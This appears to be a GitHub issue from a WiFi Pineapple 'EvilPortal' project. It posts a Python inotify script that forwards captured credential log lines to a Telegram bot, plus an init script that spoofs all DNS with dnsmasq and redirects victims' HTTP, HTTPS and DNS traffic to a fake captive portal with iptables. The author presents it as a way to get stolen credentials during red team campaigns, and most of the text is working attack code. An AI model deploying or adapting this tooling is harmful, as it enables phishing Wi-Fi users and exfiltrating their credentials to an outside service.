Open vay3t opened 2 years ago
req.txt
opkg install python3-pyinotify
/root/notify.py
import urllib.request
import urllib.parse
import sys
import pyinotify
import os.path
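# Path of the log file to watch. realpath() resolves symlinks once, when the
# module is loaded. The original `global lines` statement is dropped: at module
# level it has no effect, and `lines` is assigned further down the script.
# NOTE(review): /www is presumably the web root served by the nginx instance the
# init script starts -- confirm the server refuses to serve this dotfile,
# otherwise the log is readable by any client that can reach the web server.
file_watcher = os.path.realpath("/www/.logs")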
def count_lines(file_name):
    """Return the number of lines in the text file at *file_name*."""
    with open(file_name) as handle:
        # Iterating the handle yields one item per line, so counting the
        # items gives the same total as len(handle.readlines()).
        return sum(1 for _ in handle)
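def tail_n(file_name, n):
    """Return the last *n* lines of the text file at *file_name* as a list.

    Lines keep their trailing newline. If the file has fewer than *n* lines,
    all of them are returned. For ``n <= 0`` the result is an empty list:
    without this guard ``lines[-0:]`` is the same slice as ``lines[0:]`` and
    would return the whole file, and a negative *n* would drop lines from the
    front instead of selecting from the end.
    """
    if n <= 0:
        return []
    with open(file_name) as f:
        return f.readlines()[-n:]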
def list2string(list):
    """Concatenate the strings in *list*, in order, with no separator."""
    # The parameter name shadows the builtin `list`; it is left as-is so that
    # keyword callers keep working.
    joined = "".join(list)
    return joined
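def sender(msj):
    """Send *msj* as a Telegram message through the Bot API ``sendMessage`` call.

    An empty *msj* is replaced by the literal ``"[EvilPortal]"``. The function
    returns nothing; errors raised by ``urllib`` (connection failure, HTTP
    error status, timeout) propagate to the caller.
    """
    if msj == "":
        msj = "[EvilPortal]"

    # Placeholders to be filled in by the operator.
    # NOTE(review): the bot token is a bearer credential -- anyone who can read
    # this file can act as the bot. Keep the file readable by root only.
    token = "<TOKEN>"
    chat_id = "<CHAT_ID>"
    url = f"https://api.telegram.org/bot{token}/sendMessage"

    # NOTE(review): msj is the raw text appended to the watched log; whatever
    # it contains is transmitted to, and retained by, a third-party service.
    payload = urllib.parse.urlencode({"chat_id": chat_id, "text": msj})
    request = urllib.request.Request(url, payload.encode("ascii"))

    # The timeout keeps an unreachable network from blocking the caller
    # forever, and the context manager closes the response (and its socket)
    # instead of leaving it to the garbage collector.
    with urllib.request.urlopen(request, timeout=10):
        pass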
# Example: monitors transient files.
#
# Run this code, then run transient_file.sh in another shell.
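class ProcessTransientFile(pyinotify.ProcessEvent):
    """pyinotify event handler that forwards lines appended to ``file_watcher``."""

    def process_IN_MODIFY(self, event):
        """Print and send the lines added to the log since the last event.

        The module-level ``lines`` counter holds the line count seen at the
        previous event; it is updated here on every call.
        """
        global lines
        # We have explicitly registered for this kind of event.
        lines_now = count_lines(file_watcher)
        added = lines_now - lines
        if added <= 0:
            # Nothing was appended (or the file shrank, e.g. it was truncated).
            # Asking tail_n() for 0 lines would return the whole file through
            # the ``[-0:]`` slice and re-send every line already forwarded, so
            # only resynchronise the counter.
            lines = lines_now
            return
        # NOTE(review): the file is read twice (count, then tail); a write that
        # lands between the two reads shifts which lines tail_n() returns.
        modified = list2string(tail_n(file_watcher, added))
        print(modified)
        lines = lines_now
        sender(modified)

    def process_default(self, event):
        """Print the mask name of any event that has no dedicated handler."""
        # Implicitly IN_CREATE and IN_DELETE are watched too. You can
        # ignore them and provide an empty process_default or you can
        # process them, either with process_default or their dedicated
        # method (process_IN_CREATE, process_IN_DELETE) which would
        # override process_default.
        print('default: ', event.maskname)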
# Baseline line count: lines already present in the log when the watcher
# starts are not forwarded, only what is appended afterwards.
lines = count_lines(file_watcher)

wm = pyinotify.WatchManager()
notifier = pyinotify.Notifier(wm)

# The handler is passed as a class object (ProcessTransientFile), not as an
# instance of it.
wm.watch_transient_file(
    filename=file_watcher,
    mask=pyinotify.IN_MODIFY,
    proc_class=ProcessTransientFile,
)

# Run the event loop; this call does not return while the watcher is active.
notifier.loop()
/etc/init.d/evilportal
#!/bin/sh /etc/rc.common
# This is the auto-start script for EvilPortal
# Start-order value for this service; presumably consumed by /etc/rc.common
# (named in the shebang) when the service is enabled -- confirm.
START=200
# start: bring up the portal web stack, a catch-all DNS responder and the NAT
# redirects, then launch the log notifier in the background.
start() {
    # Enable ip forward.
    # NOTE(review): stop() does not write this value back, so forwarding stays
    # enabled after the service is stopped.
    echo 1 > /proc/sys/net/ipv4/ip_forward
    # Remove old authorized clients list
    rm /tmp/EVILPORTAL_CLIENTS.txt
    /etc/init.d/php7-fpm start
    /etc/init.d/nginx start
    # Start DNS MASQ to spoof * for unauthorized clients
    # (--address=/#/... answers every name with 172.16.42.1; -p sets the
    # listening port to 5353).
    dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353
    # Symlink evilportal portal api
    rm /www/captiveportal
    ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal
    # Run iptables commands: traffic arriving on br-lan for TCP 443 and 80 is
    # DNATed to 172.16.42.1:80, and DNS (TCP/UDP 53) to the dnsmasq instance
    # on port 5353. stop() deletes these same four rules.
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    # Wait before starting the notifier in the background. No PID is recorded
    # here, which is why stop() has to look the process up in the process list.
    sleep 10
    python3 /root/notify.py &
}
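# stop: undo what start() set up -- stop the web stack, the dnsmasq instance
# on port 5353, the portal symlink, the four NAT rules and the notifier.
# NOTE(review): start() enables /proc/sys/net/ipv4/ip_forward and nothing here
# restores it; the previous value is not recorded anywhere on this page.
stop() {
    local dnsmasq_pid notify_pids

    /etc/init.d/php7-fpm stop
    /etc/init.d/nginx stop

    # Find the dnsmasq that start() bound to port 5353. Matching the local
    # address column and the program name avoids the loose `grep 5353`, which
    # also hits any line where 5353 appears in a PID or another port and could
    # hand an unrelated process to kill.
    dnsmasq_pid=$(netstat -plant | awk '$4 ~ /:5353$/ && $NF ~ /\/dnsmasq$/ { sub(/\/.*/, "", $NF); print $NF; exit }')
    if [ -n "$dnsmasq_pid" ]; then
        kill "$dnsmasq_pid"
    fi

    # -f: do not fail when the symlink is already gone.
    rm -f /www/captiveportal

    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353

    # The bracket in the pattern keeps grep from matching its own command
    # line, so `head -2` is no longer needed and kill never receives the PID
    # of the grep process or of an unrelated command that merely mentions
    # notify.py.
    # NOTE(review): assumes the PID is the second column of `ps aux`, as the
    # original line did -- confirm against the ps implementation on the device.
    notify_pids=$(ps aux | grep '[/]root/notify.py' | awk '{print $2}')
    if [ -n "$notify_pids" ]; then
        kill $notify_pids
    fi
}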
# disable: remove every entry in /etc/rc.d whose name ends in "evilportal".
# NOTE(review): if nothing matches, the unexpanded pattern is passed to rm and
# it reports an error.
disable() {
    rm /etc/rc.d/*evilportal
}
weeeeeeeeena bayeton xuxetumare!!!
buena manito
Short story: Send captured credentials to a Telegram bot
A couple of years ago I wrote a bash script that watches a file as it is being written and sends a message through a Telegram bot every time the file is updated (https://vay3t.medium.com/creando-un-notificador-en-telegram-con-bash-b842490610).
I adapted that idea for the WiFi Pineapple so that I get Telegram notifications during red team campaigns.
/root/notify.sh
/root/hotreader.sh
/etc/init.d/evilportal
I would like to do more work on this, but I'm not very good at developing web applications.
Notes: